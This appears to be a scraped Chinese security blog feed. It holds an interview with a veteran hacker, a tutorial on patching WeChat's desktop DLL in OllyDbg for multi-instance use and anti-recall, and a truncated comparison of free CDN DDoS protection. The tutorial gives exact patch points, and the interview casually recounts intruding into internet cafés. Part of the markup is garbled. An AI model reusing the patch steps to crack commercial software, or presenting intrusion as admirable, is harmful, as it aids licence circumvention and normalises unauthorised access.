普通视图

发现新文章,点击刷新页面。
昨天以前Nuclear'Atk(核攻击)网络安全实验室

专访黑客老兵核攻击:从零开始,以码为核【T00ls人物专访第十三期】

✇Nuclear'Atk(核攻击)网络安全实验室
2025年8月29日 16:16

人物封面图

  核攻击一个在网络安全江湖中声名远扬的传奇人物,他仿佛是夜空中最亮的星,以卓越的才华和独特的魅力,照亮了整个网络安全的天空。他不仅是一位技术高超的黑客,更是一位深谙网络安全之道的智者

  作为网络安全领域的资深前辈,他在我的心中一直是一个高不可攀的存在。他的热情如同熊熊燃烧的火焰,照亮了周围每一个人;他的真诚和坦率,让人不由自主地被他吸引。他为人谦逊有礼,无论面对何种情况,都能保持一份从容和淡定,这种成熟和务实的态度,让他在同龄人中脱颖而出,成为众多人学习的榜样。

  核攻击不仅在技术上有着深厚的造诣,更在网络安全的理论和实践中有着自己独到的见解。他能够轻松地在不同的角色之间切换,无论是作为技术专家、行业评论者还是社区的活跃分子,他都能展现出非凡的才华和魅力

  他的每一次出现,都仿佛是一场精彩的表演,让人目不暇接,深受启发。

  他不仅在技术上追求卓越,更在网络安全的道德和法律边界上坚守原则。他的每一次行动,都体现了他对网络安全行业的深刻理解和对社会的责任感。他的故事和经历,激励着无数网络安全从业者不断前行,追求更高的目标

  核攻击,一个在网络安全领域中不可或缺的名字,他的传奇故事将永远激励着我们,让我们在网络安全的道路上不断探索和前行。

朋友看法

  先来让我们看看朋友们对他的看法。

  越南邻国宰相

做人做事认真严谨,行事低调,技术功底扎实,黑客圈骨灰级玩家

  Any9aby

与核总早已相识,在接触不深时就已知他的一些传说,lcx.cc 的创始人,免杀大牛等等,作为业内活跃在技术前沿的前辈,通过一些人们早已熟知的技术手段可以创造出各种不同的新玩法,给我们提供很多思路,后来才发觉,核总不仅仅对技术保持热爱,同时还是一个充分热爱生活的人,骑车,摄影,都有涉及,总会跟我们说要对新鲜事务保持热爱,对于我来说,核总是一个很值得学习的榜样。

  FrostsaberX

鸡哥是我见过最有人格魅力的人之一,作为上古时代过来的骨灰级老黑客,在和鸡哥合作的每次项目中任何问题和困难面前沉着冷静的默默承担团队大梁,手搓各种奇思巧技实现几乎不可能得绝地翻盘。技术栈广泛到怀疑人生行走的安全技术栈活字典,不管是基础设施的开发、项目和对外授课,还是无线电 IoT 都能和周围的人碰撞出不一样的火花灵感,而且热爱生活摄影烹饪顾家的十二边形大满贯全能战神。

采访话题

  接下来让我们通过几个问题,了解核攻击的内心世界。

  一、能否请您分享一下您是什么时候开始接触网络安全的?当时是出于什么契机或兴趣?

  核攻击:那是,在快二十年前,大约 2007 年前后,那会儿刚刚小学毕业,从农村踏入县城,迈入初中时代。

  也就是,在初一的微机课上,第一次亲手触摸到了以前只在黑白电视中看见过的计算机,当时仿佛有某种魔力一般,一瞬间就被电脑这种神奇的东西深深地吸引住了!从此便对它产生了浓厚的兴趣,一发不可收拾、无法自拔!

  此后,就在课余的闲暇时间中翻阅各类书籍学习,课桌上的教科书 《信息技术》 已被翻烂,里边写满了各种笔记以及自己的心得体会,还在空白处手算二、八、十、十六进制互转,用作业本、草稿纸手写程序源代码对!真正的 “写” 程序!

  那时,每周最期待的事情就是上微机课,每次遇到新的问题、知识,就等着在下周的微机课上实践,当时一周只有一节课,有时还被其他老师以各种理由占了。

  但是,仅是教科书的知识量还是太少,并不能满足当时强烈的好奇心和学习欲望,直到有一次放学路过街道上的报刊亭,想着有没有新出的《故事会》可以白嫖看看,偶然间瞅到了一本名叫 《黑客 X 档案》 的杂志,当时还不知道黑客是什么,只是看到封面和计算机知识有关,随后翻阅发现里边全是各种新奇的计算机技术,以及极客编程的奇技淫巧,于是一头扎进知识的海洋,逐行逐字看的如痴如醉,直到晚上打烊被老板赶走,心里还恋恋不舍。

  也就是,那天,人生第一次被颠覆!原来计算机世界这么大!!!黑客技术竟可以拥有如此魔力!!!

  从此,便打开了新世界的大门,一发不可收拾,用攒了很久的零花钱疯狂购买各种地摊杂志,那会儿最流行的是 《黑客 X 档案》、《黑客防线》、《黑客手册》、《大众电脑》 等,分周刊和月刊,还有年度合订本,每期必买,当时整条街就只有一个报刊亭有卖,每期还只有两三本,去迟了就没了!

  之后,就更加 “走火入魔”,白天就在学校偷偷翻杂志,在里边做满了笔记,还把一些重要的知识点写在作业本、草稿纸上,死记硬背书里的 cmd 命令、编程源码语句(啊!对对对!背的比英语课单词还多~),然后等放学、放假再去网吧包夜机通宵实战……

  在初中那个时期,整个人跟着魔一样,把每本书刊都翻了又翻,翻完杂志又去逛杂志官网论坛,自己没有电脑读取杂志附带的光盘内容,就去杂志官方论坛下载别人发布的光盘镜像,把书籍里那些软件玩的不亦乐乎,这些书籍持续陪伴我到高中时期,一直保留到现在。

  这些书刊,对当时的我影响很大,积累了丰厚的基础知识,技术在一、两年之中突飞猛进,渐渐地在当地小有名气,还收了好几个徒弟,入侵过本地几乎所有网吧,然后这些网吧老板、网管都认得我了,去上网都跟防贼似的看着……

  P.S.这里只是简略讲讲,更多当时的故事,各位读者可以参阅我博客 T00ls 十年前的采访文稿:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》

  二、在您的网络安全生涯中,有没有自己编写过一些工具或开发过相关项目?能否分享一下这些经历?

  核攻击:那是肯定的,每个真正的黑客都是编程高手,编写过的工具和项目非常多,数不胜数,从简单的 Exp 脚本、木马、远控、病毒、各类扫描器、钓鱼系统、溯源追踪、定位取证程序,到大型网站、集群控制系统、互联网级扫描测绘系统都有。

  涉及的编程语言、开发环境,以及运行平台都非常多,有 Windows、Linux、Android、iOS、Arm 等各种平台,还有各种硬件、路由器固件什么的,有时候一个项目会使用多种编程语言、多种编程方案混合开发

  在后期的实战中,以对特定目标的针对性定制程序居多,根据当前已掌握的目标情况信息、网络构架,编写一次性定制化钓鱼、渗透、后门程序,这在 APT 高级渗透实战中很常见。

  最早期,也是开发周期最久的一个系统,就是我的博客系统:Nuclear-Blog,从 2010 年起陆陆续续开发了很多年,十分简洁、高效、安全

  这个博客系统,起源也很有意思,大概在 2010 年前后,那会儿非常流行搭博客,当时我也想跟风搭建一个,但是找来找去,找不到一个安全、简洁、高效的博客程序,于是乎狠心下来自己从零开发一个,于是这套博客系统诞生了,后来命名为 Nuclear-Blog

  这套博客程序从零起步开发,并且全部代码接近于完全原创,经历了数年、无数次迭代更新,追求高度安全、稳定、简洁、高效,并且将性能优化到极限,从零手搓的动态缓存系统,以极低的性能要求满足海量访问需求,这需要大量时间和经验,同时也能深度磨练编程功力,极大地提升了个人编程水平,还能顺带学到了很多系统底层协议、知识,对个人综合技术水平提升起到了很大的帮助。

  在那个时代,很流行 CC 攻击,当时博客出名了,就引来了一大堆攻击,而且市面上大部分 CDN、防火墙 对 CC 攻击防御效果不好,于是又手搓了一套反 CC 攻击模块插件:Anti-CC,自研的防御算法,单台服务器以极低的性能需求,即可彻底防御此类攻击,并且开源,可以轻松移植到其他系统。

对新人的建议:如果你有充足的精力和时间,强烈建议独立完成一个大型项目,在这个过程中,你将碰到并解决很多棘手的疑难问题,同时积累丰厚且宝贵的经验,这将使你的知识储备和综合能力达到一个新的高度。

  三、您的学习渠道主要有哪些?在学习过程中,有没有哪些资源或平台对您帮助特别大?

  核攻击:在早期,零几年,那会儿国内的网络安全行业,还正处于盘古开天地的初期阶段,鱼龙混杂、混乱不堪,没有任何体系化的学习渠道,那会儿,主要依靠各类杂志书籍、网络安全论坛,以及各类杂七杂八的动画教程网站,如 黑客动画吧、黑鹰网络、红客联盟 等,这些网站最多的内容就是 抓鸡、盗号 了,而且大部分教程都被捆绑了一堆木马,小菜看教程中马、感染病毒是日常的事

  在中期,经过几年的学习后,积累了很多基础知识,就进入 “自学阶段”,大部分问题都可以通过历史积累知识解决,只有在碰到难以解决的疑难杂症时,才会对这块的知识进行针对性学习,积累相关经验。

  再后来,因为数年来积累了非常丰富的知识经验,几乎 99% 的问题都可以通过之前积累的丰富经验解决,此时会突然转变为 “创造模式”,会将之前积累的各种知识和经验揉碎、吸收再提取,总结为自己个人的一套方法、知识库,并不断优化,越用越顺手。

  总的来说,在学习过程中,并没有哪些资源或某个平台帮助特别大,它们都具有相同的重要性、互相互补,如果非要选个帮助最大的,那一定是 T00ls.Net(土司)、WooYun.org(乌云网),因为原创性的知识非常多,并且讲解全面、自成体系,是早期为数不多的精华渠道

  除此之外,还有 Google.com,我认为:

自学是最重要的学习渠道和能力!

  四、当时创建 lcx.cc 的起源是什么,为什么后面又关闭了?

  核攻击:起源很简单,在 2010 年左右,国内博客网站非常流行、百花齐放,如 百度博客、网易博客、博客大巴 等,很久很久以前,曾短暂用过一段时间百度博客。

  但是,因为百度监管太严、经常删文、自由度低,于是,萌生了自建博客的想法。

  然后,找了一圈没有合适的博客程序,于是又立了个 Flag,决定自己从零开发一套,然后就一边分享自己学到的新知识,以及更新各类网络安全文章,同时一边开发和完善这套博客系统,这一搞就是十年多

从某种程度上来讲,lcx.cc 可以看作是我早期学习、积累知识过程的一个缩影。

  关于中途曾短暂关站,那是在 2016 年 7 月左右,受 “WooYun.org(乌云网)” 等国内严打事件影响,伟大的国家防火墙(GFW)屏蔽了一大批知名站点,其中包括本站在内。

  这次屏蔽不是简单的国际出口屏蔽(可以翻墙访问),而是国际出口联合全国范围骨干网络线路拦截,屏蔽的非常彻底……

  正好那段时间工作非常繁忙,暂时没空解决(也无法解决),就直接关站了,这一关就是一年多(中间很多朋友询问)。

  直到 2017 年年底,偶然发现竟然解除屏蔽了!为了不让精心建设了六、七年的网站和大量高质量内容付之东流,于是抽时间重新整理了网站内容,并于 2018 年 9 月中旬重新上线

  而且这次还彻底变更了服务器基础网络构架,直接使用了 Github Pages 当服务器,又使用了 Cloudflare CDN 做加速,这些服务全部免费,且访问速度很快,只要域名不过期,网站基本永久安全稳定在线

  五、您如何看待当前网络安全行业的现状?您认为企业对网络安全的需求主要集中在哪些方面?

  核攻击

  1、当前网络安全行业的现状

  近年来,《网络安全法》《数据安全法》《个人信息保护法》等法律法规的出台,构建了网络安全领域的法律基础框架。

  这一措施,使得极客分享精神不复存在,从之前的开放、共享,变为了小密圈、内部交流,以及知识付费平台的出现,使技术知识更加闭塞、垄断

  同时,网络攻击变得更加复杂、隐蔽和具有针对性,专业组织都转入地下,高度隐蔽

  高级持续性威胁(APT) 攻击频发,勒索软件攻击呈现产业化趋势,零日漏洞数量持续增加,安全防护难度不断加大。

  传统的被动防御模式已难以应对,行业正在向 “主动免疫” 的智能防御范式转变。人工智能(AI) 技术初出茅庐,在威胁检测、安全运维、风险预测等环节的应用不断深化、快速发展。

  2、企业对网络安全的需求

  因某些特色原因,我国的网络安全 “名大于实”,企业更像是 “为了网络安全” 而去 “做网络安全”一切都是生意

  例如 “护网、红蓝对抗、比赛演习”,这些本质上还是 “形式主义”,只是为了满足资质合规要求,或完成相关任务指标,如同将头埋在沙子中的鸵鸟

  目前,国内普通企业对网络安全的需求主要还是 “各种监管、资质合规、防加密勒索、防数据泄露” 等常规需求,除了重点军工机密单位,说白了就是业务稳定能跑就行。

  云服务、微服务、轻量化容器的高速发展,使以前的开源、白盒挖洞,变成了全黑盒测试,门槛变得非常高,例如 “API、小程序、云沙盒逃逸、虚拟机/容器逃逸、认证/未授权/跨界/越权”云计算环境的渗透测试越来越多。

  六、对于刚刚进入网络安全领域的新人,您有什么建议和忠告?

  核攻击

  1、如果你是将网络安全作为一份日常谋生手段

  那建议你多多摸鱼、勤拍马屁,早日混个管理职位,或者趁早直接跳槽转行,因为纯干安全技术打工是永远发不了财的!Yep~ -_-!!!

  2、如果你是将网络安全作为一项重要兴趣爱好,并打算持续投入多年时间和精力。

  那么强烈建议你多学习、多研究、多交流疯狂积累知识和经验,打好坚实基础,强调实战、拒绝 “纸上谈兵”,尝试挑战自己独立完成各种大型项目,绝对令你受益匪浅

  而且一定要深度学习计算机底层知识,任何新技术都万变不离其宗,换来换去还是那一套(包括 AI 人工智能),

你只要吃透底层,就可以快速上手任何新技术,你只要精通一门编程语言,就可快速上手任何编程语言。

学会总结、记笔记,必要时随时复盘,构建自己的个人知识库,将之前积累的各种知识和经验揉碎、吸收再提取,总结为自己个人的一套方法、知识库,并不断优化,越用越顺手

永远保持好奇心与解决问题的热情,兴趣才是你不断钻研、克服难题的核心驱动力!

  七、您对网络安全行业的未来发展充满信心吗?您认为新人在这个领域有哪些机会和挑战?

  核攻击

人类正步入一个万物互联的时代,从智能穿戴、智能汽车到大型物联网,无数电子设备接入云端互联网世界正在被代码重新编织,未来是网络技术的世界,也是网络安全的天下。

黑客” 将会是这个世界真正的 “神仙、法师”,他们能以虚拟代码为武器,远程介入现实世界,方寸间即可 “洞悉万物”,游离时亦能 “执掌乾坤”,远程定点清除物理目标,是真正四两拨千斤的神级存在

这种力量,早已不再是虚拟的传说,而是真实的战略威慑

现在及未来战争,也将由网络安全主宰,几行代码,即可撼动一国,一个顶级黑客,完全有能力独自一人摧毁一个国家,这在现实世界中已多次证明

从 “震网病毒” 穿透虚拟世界隔离、精准摧毁物理目标,到黑客干预美国大选,以及 “巴以冲突、俄乌战争”,现代战场早已超越枪炮硝烟,进入无声而致命的数字维度

这些硝烟的背后,都是虚拟世界的数字战场、电子战争,真正的网络核攻击

未来是一个属于守护者与破局者的时代,而你,我的朋友!是否准备成为下一个 “执键” 之人?

人物评价

  核攻击,一位被同行誉为 “硬核极客” 的网络安全先驱,也是将自学精神、实战经验与技术理想深刻融合的典型代表。早年靠背命令、写代码、翻杂志 “徒手” 入门,却自驱成长为当地小有名气的 “黑客”。

  他从初中课堂到网吧实战,再到独立开发博客系统,身份在漏洞挖掘者、工具开发者、知识分享者之间自然演进;不变的是对技术的纯粹热情、对知识的系统积累和对开源精神的坚持。

  面对行业,他直言 “安全即合规” “形式主义盛行”;面对新人,他建议 “打好基础、独立做项目、吃透底层”。传奇背后,是一个把兴趣转化为实力、用代码构建自由的硬核样本。

下期预告

  下期预计采访嘉宾为查鲁特,如想要了解他的技术生涯,请在论坛留言进行提问,小编将在论坛留言板筛选部分问题来进行采访。

后记(本人补充)

十年了,很荣幸再次接受国内老牌顶级黑客组织 T00ls人物专题采访

这次人物专题访谈,对于我而言,不仅仅是一次对话与记录,更是一次对人生的深度梳理与总结。

它更像是一次与自我人生的对望,一次对过往的深刻审视,一次对未来的清晰锚定,它使我更坚定地勾勒远方,展望未来。

再次感谢 T00ls 平台,以及全体管理团队成员!

附录

  本次采访稿内容原文在 2025年08月29日 发表于 T00ls 官网官方微信公众号 等平台,相关网页链接如下:

  1. T00ls 官网:专访黑客老兵核攻击:从零开始,以码为核【T00ls人物专访第十三期】
  2. T00ls 公众号:专访黑客老兵核攻击:从零开始,以码为核【T00ls人物专访第十三期】

  同时附上 十年前上次采访的内容 (2015年12月10日),相关网页链接如下:

  1. 本站(lcx.cc):《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》
  2. T00ls 官网:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》
  3. T00ls 公众号:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》
  4. Freebuf 官网:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》
  5. Freebuf 公众号:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》

微信电脑版多开、防撤回(带撤回提示)破解方法

✇Nuclear'Atk(核攻击)网络安全实验室
2021年4月26日 23:56

前言

  网上有一堆微信电脑版多开、防撤回等破解补丁,可以实现类似的功能,但是微信是比较涉及个人隐私的社交软件,所以网上公开的补丁基本都不敢用,万一自带木马后门什么的就惨了。

  泽东同志说得好:自己动手,丰衣足食!,所以核总在这里教大家纯手工修改方法。

准备工作

  1. OllyDbg 或 OllyICE(OllyDbg 爱好者二次开发升级版本) 等反汇编软件。

  2. 安装好微信电脑版,提取安装路径文件夹中的 WeChatWin.dll 备用。

  使用 OllyDbg 纯手工修改微信电脑版 WeChatWin.dll 的汇编代码,实现无限多开和消息防撤回功能,并且有撤回提示

  该方法适用于微信电脑版(Windows PC 版)近几年的所有版本,甚至未来新版本

  有一定的技术门槛,需要了解基本的反汇编破解知识,如果不能熟练掌握 OllyDbg 等反汇编软件,那么底下内容就可以不用看了。

破解流程

1.解除多开限制

  微信启动后,会先尝试创建互斥体,如果创建成功则直接启动微信,否则依次判断 WeChatMainWndForPC 和 WeChatLoginWndForPC 两个窗口是否存在,如果存在则使用 BringWindowToTop 函数将其置顶并弹出,如果不存在则启动微信。

  上述两个窗口分别代表的是微信的主界面窗口和登陆界面窗口,如果一个微信实例已经存在,则势必处于这两种状态之一。

  微信判断是否重复启动运行的条件:

  1.如果互斥体创建成功,则直接启动微信。

  2.如果互斥体创建失败,如果查找微信相关窗口,找到则置顶并退出,未找到则启动微信。

  用伪代码表示一下判断逻辑

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

// 尝试创建互斥体
if (CreateMutex() == SUCCESS) {
    // 创建成功则启动微信
} else {
    // 创建失败则尝试查找窗口
    if (FindWindow() == SUCCESS) {
        // 找到微信窗口,则将已有窗口置顶,然后结束程序
    } else {
        // 未找到微信窗口,则启动微信
    }
}

  所以破解思路就很简单了,首先使用 OllyDbg 查找所有参考文本字符串:

  WeChatMainWndForPCWeChatLoginWndForPC

  然后找到以下这段代码并修改(看右侧的注释说明,需要修改 1 处星标的行):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

5B36F8B0  /$  E8 6B000000   call WeChatWi.5B36F920                                                      创建互斥体
5B36F8B5      84C0          test al,al                                                                  判断互斥体是否创建成功
5B36F8B7  |.  74 56         je short WeChatWi.5B36F90F                                                  ★ je 改为 jmp,不管是否创建成功都强制跳转,并且跳过底下的窗口查找判断
5B36F8B9  |.  56            push esi
5B36F8BA  |.  6A 00         push 0x0                                 ; /Title = NULL
5B36F8BC  |.  68 2819105C   push WeChatWi.5C101928                   ; |Class = "WeChatMainWndForPC"
5B36F8C1  |.  FF15 1CD8F15B call dword ptr ds:[<&USER32.FindWindowW>>; \FindWindowW
5B36F8C7  |.  8BF0          mov esi,eax                              ;  WeChatWi.5A960000
5B36F8C9  |.  85F6          test esi,esi
5B36F8CB  |.  75 12         jnz short WeChatWi.5B36F8DF                                                 > 如果找到窗口 WeChatMainWndForPC 则将该窗口切换到顶层然后退出(按理说修改这个字符串也可以实现绕过多开检测)
5B36F8CD  |.  50            push eax                                 ; /Title = "婍?#34;
5B36F8CE  |.  68 9C0D105C   push WeChatWi.5C100D9C                   ; |Class = #34;WeChatLoginWndForPC#34;
5B36F8D3  |.  FF15 1CD8F15B call dword ptr ds:[lt;amp;USER32.FindWindowWgt;gt;; \FindWindowW
5B36F8D9  |.  8BF0          mov esi,eax                              ;  WeChatWi.5A960000
5B36F8DB  |.  85F6          test esi,esi
5B36F8DD  |.  74 2B         je short WeChatWi.5B36F90A                                                  gt; 如果找到窗口 微信:WeChatLoginWndForPC 则将该窗口切换到顶层然后退出(按理说修改这个字符串也可以实现绕过多开检测)
5B36F8DF  |gt;  6A 01         push 0x1
5B36F8E1  |.  56            push esi
5B36F8E2  |.  FF15 88D7F15B call dword ptr ds:[lt;amp;USER32.SwitchToThisgt;;  user32.SwitchToThisWindow       以下代码为置顶已登录的窗口
5B36F8E8  |.  56            push esi                                 ; /hWnd = 00000001
5B36F8E9  |.  FF15 8CD7F15B call dword ptr ds:[lt;amp;USER32.BringWindowTgt;; \BringWindowToTop
5B36F8EF  |.  6A 00         push 0x0                                 ; /pResult = NULL
5B36F8F1  |.  68 E8030000   push 0x3E8                               ; |Timeout = 1000. ms
5B36F8F6  |.  6A 02         push 0x2                                 ; |Flags = SMTO_NORMAL|SMTO_ABORTIFHUNG
5B36F8F8  |.  6A 00         push 0x0                                 ; |lParam = 0x0
5B36F8FA  |.  6A 00         push 0x0                                 ; |wParam = 0x0
5B36F8FC  |.  68 E00B0000   push 0xBE0                               ; |Message = MSG(0xBE0)
5B36F901  |.  56            push esi                                 ; |hWnd = 00000001
5B36F902  |.  FF15 74D9F15B call dword ptr ds:[lt;amp;USER32.SendMessageTgt;; \SendMessageTimeoutW
5B36F908  |.  85F6          test esi,esi
5B36F90A  |gt;  0f95c0        setne al
5B36F90D  |.  5E            pop esi                                  ;  LoadDl_1.60001057
5B36F90E  |.  C3            retn                                                                        函数返回(有多开时)
5B36F90F  |gt;  32C0          xor al,al                                                                   函数返回(没有多开时)
5B36F911  \.  C3            retn
/code/pre/td/tr/table
/div
/divh3 id="2消息防撤回"2.消息防撤回/h3
p  a href="https://lcx.cc/post/4600/"消息防撤回/a,strong带对方撤回消息提示!/strong/p
p  和上边一样,先查找所有参考文本字符串:strongpStrMsgid value is null/strong/p
p  然后找到以下这段代码并修改(strong看右侧的注释说明,需要修改 1 处星标的行/strong):/p
div class="highlight"div class="chroma"
table class="lntable"trtd class="lntd"
pre class="chroma"codespan class="lnt" 1
/spanspan class="lnt" 2
/spanspan class="lnt" 3
/spanspan class="lnt" 4
/spanspan class="lnt" 5
/spanspan class="lnt" 6
/spanspan class="lnt" 7
/spanspan class="lnt" 8
/spanspan class="lnt" 9
/spanspan class="lnt"10
/spanspan class="lnt"11
/spanspan class="lnt"12
/spanspan class="lnt"13
/spanspan class="lnt"14
/spanspan class="lnt"15
/spanspan class="lnt"16
/spanspan class="lnt"17
/spanspan class="lnt"18
/spanspan class="lnt"19
/spanspan class="lnt"20
/spanspan class="lnt"21
/spanspan class="lnt"22
/spanspan class="lnt"23
/spanspan class="lnt"24
/spanspan class="lnt"25
/spanspan class="lnt"26
/spanspan class="lnt"27
/spanspan class="lnt"28
/spanspan class="lnt"29
/spanspan class="lnt"30
/spanspan class="lnt"31
/spanspan class="lnt"32
/spanspan class="lnt"33
/spanspan class="lnt"34
/spanspan class="lnt"35
/spanspan class="lnt"36
/spanspan class="lnt"37
/spanspan class="lnt"38
/spanspan class="lnt"39
/spanspan class="lnt"40
/spanspan class="lnt"41
/spanspan class="lnt"42
/spanspan class="lnt"43
/spanspan class="lnt"44
/spanspan class="lnt"45
/spanspan class="lnt"46
/spanspan class="lnt"47
/spanspan class="lnt"48
/span/code/pre/td
td class="lntd"
pre class="chroma"code class="language-fallback" data-lang="fallback"68E854DA  |gt; \8B06          mov eax,dword ptr ds:[esi]
68E854DC  |.  8BCE          mov ecx,esi
68E854DE  |.  FF50 18       call dword ptr ds:[eax+0x18]
68E854E1  |.  85C0          test eax,eax                             ;  WeChatWi.68B90000
68E854E3  |.^ 74 9D         je short WeChatWi.68E85482
68E854E5  |.  68 F4C7336A   push WeChatWi.6A33C7F4                   ;  ASCII #34;revokemsg#34;
68E854EA  |.  8BC8          mov ecx,eax                              ;  WeChatWi.68B90000
68E854EC  |.  E8 0F2F7700   call WeChatWi.695F8400
68E854F1  |.  8BF0          mov esi,eax                              ;  WeChatWi.68B90000
68E854F3  |.  85F6          test esi,esi
68E854F5  |.^ 74 8B         je short WeChatWi.68E85482
68E854F7  |.  68 F8D4336A   push WeChatWi.6A33D4F8                   ;  ASCII #34;newmsgid#34;
68E854FC  |.  8BCE          mov ecx,esi
68E854FE  |.  E8 FD2E7700   call WeChatWi.695F8400
68E85503  |.  85C0          test eax,eax                             ;  WeChatWi.68B90000    ★ 修改为 xor eax,eax
68E85505  |.  74 7B         je short WeChatWi.68E85582                                       gt; PS:或者把 je 改为 jne 也可以?待测试!
68E85507  |.  8BC8          mov ecx,eax                              ;  WeChatWi.68B90000
68E85509  |.  E8 82377700   call WeChatWi.695F8C90
68E8550E  |.  85C0          test eax,eax                             ;  WeChatWi.68B90000
68E85510  |.  75 62         jnz short WeChatWi.68E85574
68E85512  |.  0F1005 98F52Bgt;movups xmm0,dqword ptr ds:[0x6A2BF598]
68E85519  |.  83EC 10       sub esp,0x10
68E8551C  |.  BA C0C3336A   mov edx,WeChatWi.6A33C3C0                ;  ASCII #34;02_manager\ChatMgr.cpp#34;
68E85521  |.  8BC4          mov eax,esp
68E85523  |.  B9 02000000   mov ecx,0x2
68E85528  |.  83EC 10       sub esp,0x10
68E8552B  |.  0F1100        movups dqword ptr ds:[eax],xmm0
68E8552E  |.  8BC4          mov eax,esp
68E85530  |.  83EC 10       sub esp,0x10
68E85533  |.  0F1100        movups dqword ptr ds:[eax],xmm0
68E85536  |.  8BC4          mov eax,esp
68E85538  |.  83EC 10       sub esp,0x10
68E8553B  |.  0F1100        movups dqword ptr ds:[eax],xmm0
68E8553E  |.  8BC4          mov eax,esp
68E85540  |.  83EC 10       sub esp,0x10
68E85543  |.  0F1100        movups dqword ptr ds:[eax],xmm0
68E85546  |.  8BC4          mov eax,esp
68E85548  |.  83EC 10       sub esp,0x10
68E8554B  |.  0F1100        movups dqword ptr ds:[eax],xmm0
68E8554E  |.  8BC4          mov eax,esp
68E85550  |.  68 E0D4336A   push WeChatWi.6A33D4E0                   ;  ASCII #34;pStrMsgid value is null#34;
68E85555  |.  68 F8C3336A   push WeChatWi.6A33C3F8                   ;  ASCII #34;ChatMgr#34;
68E8555A  |.  68 C4D4336A   push WeChatWi.6A33D4C4                   ;  ASCII #34;ChatMgr::parseRevokeContent#34;
68E8555F  |.  68 8B080000   push 0x88B
68E85564  |.  0F1100        movups dqword ptr ds:[eax],xmm0
68E85567  |.  E8 54732900   call WeChatWi.6911C8C0
68E8556C  |.  83C4 70       add esp,0x70
68E8556F  |.^ E9 0EFFFFFF   jmp WeChatWi.68E85482
/code/pre/td/tr/table
/div
/divh3 id="3破解完成"3.破解完成/h3
p  复制所有修改并保存到文件,然后替换 WeChatWin.dll 原文件,重新运行微信即可。/p
h2 id="下载地址"下载地址/h2
p  不提供任何破解文件下载,免得腾讯律师函警告。/p
h2 id="参考资料"参考资料/h2
p  a href="https://user.guancha.cn/main/content?id=351956amp;page=2"微信PC端多开的秘密/a/p
p  a href="http://vulsee.com/archives/vulsee_2021/0302_13882.html"微信PC段防撤回DLL(WeChatWin.dll)修改测试/a/p
p  a href="https://jishuin.proginn.com/p/763bfbd28ba4"深扒微信多开的秘密后,我竟然发现了个 bug/a/p
p  a href="https://www.ghpym.com/pcwechat.html"微信 最新 电脑版 绿色修改版/a,和官方同步更新,有现成破解补丁下载,strong安全性自测/strong!/p
p  a href="http://www.qiuquan.cc/chat/wechat.html"微信 最新 电脑版 正式版+测试版+开发版(多开+防撤回,带撤回提示)/a,和官方同步更新,有现成破解补丁下载,strong安全性自测/strong!/p

国内各大免费 CDN 性能及 DDOS 防御对比

✇Nuclear'Atk(核攻击)网络安全实验室
2018年9月15日 16:04
h2 id="前言"前言/h2 p  国内有很多免费 CDN 申请及使用的教程,也有一些简单的速度对比教程,但是没有一篇关于免费流量多少及 DDOS 防御高低的完整对比文章。/p p  数月前,由于有这个需求,所以将国内各大免费 CDN 的性能及 DDOS 防御进行了对比,具体看底下。/p p  emPS:由于国内特色政策,所以本站使用的国外 a href="https://www.cloudflare.com/"Cloudflare/a 免费加速及防御服务。/em/p h2 id="阿里云"阿里云/h2 p  首先是阿里云的虚拟主机以及 VPS 默认防御标准。/p p  目前 ECS、SLB、WAF、VPC、EIP、NAT 等云产品的被攻击流量触发黑洞阈值根据不同地区从 500Mbps 到 5Gbps 不等,具体参考下表。/p h3 id="云虚拟主机-ddos-防护黑洞阈值"云虚拟主机 DDoS 防护黑洞阈值/h3 table thead tr th地区/th th独享虚拟主机/th /tr /thead tbody tr td华东 1(杭州)/td td5G/td /tr tr td华北 1(青岛)/td td5G/td /tr tr td华南 1(深圳)/td td2G/td /tr tr td华北 2(北京)/td td2G/td /tr tr td华东 2(上海)/td td2G/td /tr tr td香港/td td500M/td /tr tr td美国/td td500M/td /tr tr td新加坡/td td500M/td /tr /tbody /table h3 id="云盾-ddos-基础防护黑洞阈值"云盾 DDoS 基础防护黑洞阈值/h3 p  此规则适用于阿里云 ECS、SLB、及 EIP 实例。/p table thead tr th地区/th th1 核/th th2 核/th th4 核以上/th thSLB/EIP(含NAT网关公网IP)/th /tr /thead tbody tr td华北 1/td td500 M/td td1 G/td td5 G/td td5 G/td /tr tr td华北 2/td td500 M/td td1 G/td td2 G/td td2 G/td /tr tr td华北 3/td td500 M/td td1 G/td td2 G/td td2 G/td /tr tr td华东 1/td td500 M/td td1 G/td td5 G/td td5G/td /tr tr td华东 2/td td500 M/td td1 G/td td2 G/td td2 G/td /tr tr td华南 1/td td500 M/td td1 G/td td2 G/td td2 G/td /tr tr td香港/td td500 M/td td500 M/td td500 M/td td500 M/td /tr tr td美东 1/td td500 M/td td500 M/td td500 M/td td500 M/td /tr tr td美西 1/td td500 M/td td1 G/td td2 G/td td2 G/td /tr tr td孟买/td td500 M/td td1 G/td td1 G/td td1 G/td /tr tr td悉尼/td td500 M/td td500 M/td td500 M/td td500 M/td /tr tr td迪拜/td td500 M/td td500 M/td td500 M/td td500 M/td /tr tr td东京/td td500 M/td td500 M/td td500 M/td td500 M/td /tr tr td新加坡/td td500 M/td td500 M/td td500 M/td td500 M/td /tr tr td吉隆坡/td td500 M/td td500 M/td td500 M/td td500 M/td /tr tr td法兰克福/td td500 M/td td500 M/td td500 M/td td500 M/td /tr /tbody /table h3 id="说明"说明/h3 p  1、DDOS 攻击流量超过防御峰值则自动进入黑洞。/p p  2、默认的黑洞时长是2.5小时,黑洞期间不支持解封。/p p  3、实际黑洞时长视攻击情况而定,从30分钟到24小时不等。/p h3 id="总结"总结/h3 p  strong注意阿里云的流量单位/strong为 Mbps、5Gbps,也就是说实际上:/p p  500Mbps = 500 / 8 = 62.5MB/s/p p  5Gbps = 5 * 1024 / 8 = 640MB/s/p p  strong防御力度一般/strong,很容易超过 DDOS 峰值进入黑洞。/p p  